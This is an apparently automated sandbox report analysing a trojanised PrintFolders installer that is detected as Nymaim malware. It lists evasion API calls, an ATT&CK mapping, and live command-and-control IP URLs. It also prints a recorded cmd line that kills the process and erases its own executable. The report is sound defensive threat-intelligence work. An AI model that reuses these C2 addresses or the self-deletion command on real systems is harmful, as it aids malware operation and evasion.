Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe	Code function: 2_2_004429E7 mov eax, dword ptr fs:[00000030h]	2_2_004429E7
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe	Code function: 2_2_00417BAF mov eax, dword ptr fs:[00000030h]	2_2_00417BAF
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe	Code function: 2_2_100091C7 mov eax, dword ptr fs:[00000030h]	2_2_100091C7
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe	Code function: 2_2_10006CE1 mov eax, dword ptr fs:[00000030h]	2_2_10006CE1

Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe	Code function: 2_2_0040F789 SetUnhandledExceptionFilter,	2_2_0040F789
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe	Code function: 2_2_0041336B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_0041336B
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe	Code function: 2_2_0040F5F5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_0040F5F5
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe	Code function: 2_2_0040EBD2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_0040EBD2
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe	Code function: 2_2_10006180 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_10006180
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe	Code function: 2_2_100035DF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_100035DF
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe	Code function: 2_2_10003AD4 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_10003AD4

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "PrintFolders.exe" /f

Jump to behavior

Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "PrintFolders.exe" /f & erase "C:\Program Files (x86)\PrintFolders\PrintFolders.exe" & exit			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "PrintFolders.exe" /f			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp

Code function: 1_2_004593E4 GetVersion,GetModuleHandleA,6D2B5550,6D2B5550,6D2B5550,AllocateAndInitializeSid,LocalFree,

1_2_004593E4

Source: PrintFolders.exe, 00000002.00000002.326163828.000000000353F000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: PrintFolders.exe, 00000002.00000002.326163828.000000000353F000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: F.program manager-
Source: PrintFolders.exe, 00000002.00000002.326163828.000000000353F000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: program manager

Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoA,	0_2_004051C8
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoA,	0_2_00405214
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Code function: GetLocaleInfoA,	1_2_0040874C
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	Code function: GetLocaleInfoA,	1_2_00408798
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe	Code function: GetKeyboardLayoutList,GetLocaleInfoA,__Init_thread_footer,	2_2_00404D40
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe	Code function: EnumSystemLocalesW,	2_2_00427041
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe	Code function: EnumSystemLocalesW,	2_2_0042708C
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe	Code function: EnumSystemLocalesW,	2_2_00427127
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	2_2_004271B2
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe	Code function: EnumSystemLocalesW,	2_2_0041E2FF
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe	Code function: GetLocaleInfoW,	2_2_00427405
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	2_2_0042752B
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe	Code function: GetLocaleInfoW,	2_2_00427631
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	2_2_00427700
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe	Code function: GetLocaleInfoW,	2_2_0041E821
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	2_2_00426D9F

Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe

Code function: 2_2_0040F7F3 cpuid

2_2_0040F7F3

Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp

Code function: 1_2_00455B2C GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeA,GetLastError,6D2B5CA0,SetNamedPipeHandleState,6D747180,CloseHandle,CloseHandle,

1_2_00455B2C

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_004026C4 GetSystemTime,

0_2_004026C4

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00405CB0 GetVersionExA,

0_2_00405CB0

Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp

Code function: 1_2_00453A24 GetUserNameA,

1_2_00453A24

Stealing of Sensitive Information

Yara detected Nymaim

Source: Yara match	File source: 2.2.PrintFolders.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.PrintFolders.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.PrintFolders.exe.33a0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.PrintFolders.exe.33a0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.325696039.0000000001660000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.326103420.00000000033A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Windows Management Instrumentation	Path Interception	1 Access Token Manipulation	2 Masquerading	1 Input Capture	1 System Time Discovery	Remote Services	1 Input Capture	Exfiltration Over Other Network Medium	2 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	13 Process Injection	1 Disable or Modify Tools	LSASS Memory	141 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	Exfiltration Over Bluetooth	2 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	2 Native API	Logon Script (Windows)	Logon Script (Windows)	1 Access Token Manipulation	Security Account Manager	3 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	1 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	13 Process Injection	NTDS	11 Application Window Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	11 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 Account Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	3 Obfuscated Files or Information	Cached Domain Credentials	1 System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	23 Software Packing	DCSync	3 File and Directory Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	26 System Information Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

⊘No Antivirus matches

Dropped Files

Source	Detection	Scanner	Label
C:\Program Files (x86)\PrintFolders\PrintFolders.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\PrintFolders\Russian.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\PrintFolders\is-2632S.tmp	0%	ReversingLabs
C:\Program Files (x86)\PrintFolders\is-48N1K.tmp	2%	ReversingLabs
C:\Program Files (x86)\PrintFolders\unins000.exe (copy)	2%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-385TG.tmp\_iscrypt.dll	2%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-385TG.tmp\_isetup\_setup64.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-385TG.tmp\_isetup\_shfoldr.dll	2%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp	4%	ReversingLabs
C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\uywwtiNQ.exe	46%	ReversingLabs	Win32.Trojan.Generic

Unpacked PE Files

Source	Detection	Scanner	Label	Download
2.2.PrintFolders.exe.10000000.6.unpack	100%	Avira	TR/Crypt.XPACK.Gen8	Download File
1.2.is-QPTG8.tmp.400000.0.unpack	100%	Avira	HEUR/AGEN.1232832	Download File
2.2.PrintFolders.exe.400000.1.unpack	100%	Avira	HEUR/AGEN.1250671	Download File
0.2.file.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1248792	Download File
0.3.file.exe.20b8000.6.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://www.innosetup.com/	0%	URL Reputation	safe
http://45.139.105.171/itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte	0%	URL Reputation	safe
http://107.182.129.235/storage/extension.php	0%	URL Reputation	safe
http://www.remobjects.com/?ps	0%	URL Reputation	safe
http://www.innosetup.com	0%	URL Reputation	safe
http://107.182.129.235/storage/ping.php	0%	URL Reputation	safe
http://107.182.129.235/storage/ping.php	0%	URL Reputation	safe
http://171.22.30.106/library.php	100%	URL Reputation	malware
http://www.remobjects.com/?psU	0%	URL Reputation	safe
http://171.22.30.106/library.phpXZ	100%	Avira URL Cloud	malware
http://107.182.129.235/storage/extension.phpum	0%	Avira URL Cloud	safe
http://www.atopoint.com	0%	Virustotal		Browse
http://pfolders.atopoint.com.	0%	Avira URL Cloud	safe
http://www.atopoint.com	0%	Avira URL Cloud	safe
http://pfolders.atopoint.com	0%	Avira URL Cloud	safe
http://www.atopoint.com.	0%	Avira URL Cloud	safe
http://171.22.30.106/library.phpBZ	100%	Avira URL Cloud	malware
http://www.innosetup.comDVarFileInfo$	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

⊘No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://45.139.105.171/itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte	false	URL Reputation: safe	unknown
http://107.182.129.235/storage/extension.php	true	URL Reputation: safe	unknown
http://107.182.129.235/storage/ping.php	true	URL Reputation: safe URL Reputation: safe	unknown
http://171.22.30.106/library.php	true	URL Reputation: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://pfolders.atopoint.com.	file.exe, 00000000.00000003.327202532.00000000020B1000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.239393272.00000000020B1000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.innosetup.com/	is-QPTG8.tmp, is-QPTG8.tmp, 00000001.00000000.240048151.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-48N1K.tmp.1.dr, is-QPTG8.tmp.0.dr	false	URL Reputation: safe	unknown
http://171.22.30.106/library.phpXZ	PrintFolders.exe, 00000002.00000002.325942100.0000000001762000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.atopoint.com	file.exe, 00000000.00000003.239322832.00000000021A0000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.327202532.00000000020B1000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.239393272.00000000020B1000.00000004.00001000.00020000.00000000.sdmp, is-QPTG8.tmp, 00000001.00000003.240607544.0000000002750000.00000004.00001000.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.remobjects.com/?ps	file.exe, 00000000.00000003.239484290.00000000021A0000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.239653432.00000000020B8000.00000004.00001000.00020000.00000000.sdmp, is-QPTG8.tmp, is-QPTG8.tmp, 00000001.00000000.240048151.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-48N1K.tmp.1.dr, is-QPTG8.tmp.0.dr	false	URL Reputation: safe	unknown
http://pfolders.atopoint.com	file.exe, 00000000.00000003.239393272.00000000020B1000.00000004.00001000.00020000.00000000.sdmp, is-QPTG8.tmp, 00000001.00000003.240607544.0000000002750000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.innosetup.com	file.exe	false	URL Reputation: safe	unknown
http://107.182.129.235/storage/extension.phpum	PrintFolders.exe, 00000002.00000002.325958183.0000000001773000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.atopoint.com.	file.exe, 00000000.00000003.327202532.00000000020B1000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.239393272.00000000020B1000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://171.22.30.106/library.phpBZ	PrintFolders.exe, 00000002.00000002.325942100.0000000001762000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.innosetup.comDVarFileInfo$	file.exe, 00000000.00000003.239484290.00000000021A0000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.239653432.00000000020B8000.00000004.00001000.00020000.00000000.sdmp, is-QPTG8.tmp, 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmp, is-48N1K.tmp.1.dr, is-QPTG8.tmp.0.dr	false	Avira URL Cloud: safe	low
http://www.remobjects.com/?psU	file.exe, 00000000.00000003.239484290.00000000021A0000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.239653432.00000000020B8000.00000004.00001000.00020000.00000000.sdmp, is-QPTG8.tmp, 00000001.00000000.240048151.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-48N1K.tmp.1.dr, is-QPTG8.tmp.0.dr	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
45.139.105.171	unknown	Italy	33657	CMCSUS	false
45.139.105.1	unknown	Italy	33657	CMCSUS	true
85.31.46.167	unknown	Germany	43659	CLOUDCOMPUTINGDE	true
107.182.129.235	unknown	Reserved	11070	META-ASUS	true
171.22.30.106	unknown	Germany	33657	CMCSUS	true

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	753425
Start date and time:	2022-11-24 20:03:09 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 58s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	file.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	18
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal88.troj.evad.winEXE@12/23@0/5
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 39.1% (good quality ratio 37.9%) Quality average: 80.9% Quality standard deviation: 24.7%
HCA Information:	Successful, ratio: 96% Number of executed functions: 165 Number of non-executed functions: 248
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
20:04:06	API Interceptor	1x Sleep call for process: uywwtiNQ.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
45.139.105.171	file.exe	Get hash	malicious	Browse	45.139.105.171/itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte
	file.exe	Get hash	malicious	Browse	45.139.105.171/itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte
	file.exe	Get hash	malicious	Browse	45.139.105.171/itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte
	file.exe	Get hash	malicious	Browse	45.139.105.171/itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte
	OeyC396Ez1.exe	Get hash	malicious	Browse	45.139.105.171/itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixshop
	file.exe	Get hash	malicious	Browse	45.139.105.171/itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte
	file.exe	Get hash	malicious	Browse	45.139.105.171/itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte
	file.exe	Get hash	malicious	Browse	45.139.105.171/itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte
	7MOu36PV5V.exe	Get hash	malicious	Browse	45.139.105.171/itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixshop
	file.exe	Get hash	malicious	Browse	45.139.105.171/itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte
	file.exe	Get hash	malicious	Browse	45.139.105.171/itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte
	file.exe	Get hash	malicious	Browse	45.139.105.171/itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte
	file.exe	Get hash	malicious	Browse	45.139.105.171/itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte
	ua05xHirq5.exe	Get hash	malicious	Browse	45.139.105.171/itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixshop
	file.exe	Get hash	malicious	Browse	45.139.105.171/itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte
	file.exe	Get hash	malicious	Browse	45.139.105.171/itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte
	file.exe	Get hash	malicious	Browse	45.139.105.171/itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte
	file.exe	Get hash	malicious	Browse	45.139.105.171/itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte
	file.exe	Get hash	malicious	Browse	45.139.105.171/itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte
	file.exe	Get hash	malicious	Browse	45.139.105.171/itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CMCSUS	file.exe	Get hash	malicious	Browse	171.22.30.106
	file.exe	Get hash	malicious	Browse	171.22.30.106
	file.exe	Get hash	malicious	Browse	171.22.30.106
	file.exe	Get hash	malicious	Browse	171.22.30.106
	OeyC396Ez1.exe	Get hash	malicious	Browse	171.22.30.106
	file.exe	Get hash	malicious	Browse	171.22.30.106
	file.exe	Get hash	malicious	Browse	171.22.30.106
	file.exe	Get hash	malicious	Browse	171.22.30.106
	7MOu36PV5V.exe	Get hash	malicious	Browse	171.22.30.106
	file.exe	Get hash	malicious	Browse	171.22.30.106
	file.exe	Get hash	malicious	Browse	171.22.30.106
	file.exe	Get hash	malicious	Browse	171.22.30.106
	file.exe	Get hash	malicious	Browse	171.22.30.106
	ua05xHirq5.exe	Get hash	malicious	Browse	45.139.105.1
	file.exe	Get hash	malicious	Browse	171.22.30.106
	file.exe	Get hash	malicious	Browse	171.22.30.106
	file.exe	Get hash	malicious	Browse	171.22.30.106
	file.exe	Get hash	malicious	Browse	171.22.30.106
	file.exe	Get hash	malicious	Browse	171.22.30.106
	file.exe	Get hash	malicious	Browse	171.22.30.106
CMCSUS	file.exe	Get hash	malicious	Browse	171.22.30.106
	file.exe	Get hash	malicious	Browse	171.22.30.106
	file.exe	Get hash	malicious	Browse	171.22.30.106
	file.exe	Get hash	malicious	Browse	171.22.30.106
	OeyC396Ez1.exe	Get hash	malicious	Browse	171.22.30.106
	file.exe	Get hash	malicious	Browse	171.22.30.106
	file.exe	Get hash	malicious	Browse	171.22.30.106
	file.exe	Get hash	malicious	Browse	171.22.30.106
	7MOu36PV5V.exe	Get hash	malicious	Browse	171.22.30.106
	file.exe	Get hash	malicious	Browse	171.22.30.106
	file.exe	Get hash	malicious	Browse	171.22.30.106
	file.exe	Get hash	malicious	Browse	171.22.30.106
	file.exe	Get hash	malicious	Browse	171.22.30.106
	ua05xHirq5.exe	Get hash	malicious	Browse	45.139.105.1
	file.exe	Get hash	malicious	Browse	171.22.30.106
	file.exe	Get hash	malicious	Browse	171.22.30.106
	file.exe	Get hash	malicious	Browse	171.22.30.106
	file.exe	Get hash	malicious	Browse	171.22.30.106
	file.exe	Get hash	malicious	Browse	171.22.30.106
	file.exe	Get hash	malicious	Browse	171.22.30.106

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Program Files (x86)\PrintFolders\Russian.dll (copy)	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse

Created / dropped Files

C:\Program Files (x86)\PrintFolders\Guide.chm (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp
File Type:	MS Windows HtmlHelp Data
Category:	dropped
Size (bytes):	118869
Entropy (8bit):	7.933172616287708
Encrypted:	false
SSDEEP:	1536:a8+b7UxVIBmVQVxSHmIKruCGFkw8dctBJcIFEvSrT3eoxNjT+YL/fe3iWP7:Z+b76wV3hCb86tBJc7SffxNjqO/qiWT
MD5:	204A5BF160646F9A55ED70AB6E1A07A6
SHA1:	5404AB219FA01C270ADC36303D447109503C4A4D
SHA-256:	CACDD2C8BFA4BAE33A16A10ED609F4841AC5C4C2FE481ED0FD8CB04BC8016BBD
SHA-512:	6AAFBAF8565BF57BF4CC9E8D5EEF947E32E0D1A962C0BB619A25C35C68B7AA24599C60CB1C1B108FC9F58A1F13FF80B66E1A4DA506BE2FFD2DD05331865DAA15
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	ITSF....`..................\|.{.......".....\|.{......."..`...............x.......T.......................U...............ITSP....T...........................................j..].!......."..T...............PMGL................./..../#IDXHDR......./#ITBITS..../#STRINGS...>.../#SYSTEM..V.../#TOPICS....`./#URLSTR...Gw./#URLTBL....H./#WINDOWS.....D./$FIftiMain...g..8./$OBJINST...T.../author.htm...m.<./cmdline.htm...O.../ctxmenu.jpg...3..B./index.htm..'.y./interface.htm.. .^./logo.jpg...P..4./main.css...u.../PrintDir.hhc...).'./screenshot.jpg.....././shell.htm...~.Q.::DataSpace/NameList..<(::DataSpace/Storage/MSCompressed/Content..[...,::DataSpace/Storage/MSCompressed/ControlData.j.)::DataSpace/Storage/MSCompressed/SpanInfo.b./::DataSpace/Storage/MSCompressed/Transform/List.<&_::DataSpace/Storage/MSCompressed/Transform/{7FC28940-9D31-11D0-9B27-00A0C91E9C7C}/InstanceData/...i::DataSpace/Storage/MSCompressed/Transform/{7FC28940-9D31-11D0-9B27-00A0C91E9C7C}/InstanceData/ResetTable...P...........

C:\Program Files (x86)\PrintFolders\History.txt (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	5403
Entropy (8bit):	4.918324842676727
Encrypted:	false
SSDEEP:	96:uUzxQ0Bz664UbxDcqEVFUz1BDzeRGH+QanjY3ZLBxdfC4INXM/gr53F8EPeHl9j4:uU1QyZ4e9cqEfUz1BD0GH+QGjYJBxdfY
MD5:	C8B211D81EB7D4F9EBB071A117444D51
SHA1:	43BF57BB0931EBED953FE17F937C1C7FF58A027C
SHA-256:	AFD6FEA6A792B722E45A6587F70334F30051798017F4A278508C7ED3FEEA80CC
SHA-512:	C7C558EB666B570A0B03D1E8941217673677A6AF1F7CE4C43BE77D1AA859AD8DF7B212CF778B03678DD451535C7A7B02FEB65F20B744A8E9C969DF633F79A2AB
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	=====================.. History of Releases..=====================....Legend..------..[+] - added..[] - modified..[-] - bug fixed......Version 2.51b..-------------..[-] The output file path wasn't updated in certain circumstances..[-] Added the workaround for the modal message boxes bug in Wine....Version 2.51a..-------------..[+] Focus rectangle added for the "Go!" button..[+] Added program version to the setup info..[] A couple of interface optimizations..[-] "Check for updates" now should work under Wine....Version 2.51..------------..[+] The "Help" buttons now present in each dialog..[+] Russian user interface..[] Improved Wine compatibility..[-] One very elusive bug inherited from the early versions finally fixed..[-] Improved the "Check for updates" behavior..[-] Fixed several regressions and smaller bugs....Version 2.5..-----------..[+] Checking for updates on startup (registered users only)..[] Faster processing of large numbers of files..[*] Folders containing no files acc

C:\Program Files (x86)\PrintFolders\License.txt (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp
File Type:	RAGE Package Format (RPF),
Category:	dropped
Size (bytes):	3391
Entropy (8bit):	4.812121234949207
Encrypted:	false
SSDEEP:	96:FjjD9GrzqpptIaj6JGcnRH7aamJL4zUtWAbakj:FYrrawhbaVFtTuk
MD5:	A5E8094B0CBADE929AEE07F5DA5E9429
SHA1:	60BB56A380CD9126AC067AE39B262E28A22532CD
SHA-256:	F3AC2009C96EB3A42AFAEC7FA67D3A14E5E9E30819B543D572C9BEA790CFCAD1
SHA-512:	018D1963A0B45A731687C5811E6447911E9BC7285B25EE3BBAD95D4D9C23718EF4E9714714C8A68617EAE4F840FB3D76BC77B0C49A64346D9605CCF70592356C
Malicious:	false
Preview:	PRINTFOLDERS version 2.51b..Copyright (C) 2009-2012 Andrey Pivovarov. All rights reserved.....END USER LICENSE AGREEMENT....This license describes the conditions under which you may use version 2.51b of ..PrintFolders ("the program"). If you are unable or unwilling to accept these ..conditions in full, then, notwithstanding the conditions in the remainder of ..this license, you may not use the program at all.....The program is a full-functional software. The program never expires and may be ..used for any period of time. The program has no exclusive limitations and does ..not require registration, though you may register your copy of the program to ..support the authors and remove the nag screens.....You may copy and distribute verbatim copies of the program executable, in any ..medium, provided that you conspicuously and appropriately publish on each copy ..an appropriate copyright notice and disclaimer of warranty; keep intact all the ..notices that refer to this license and to the a

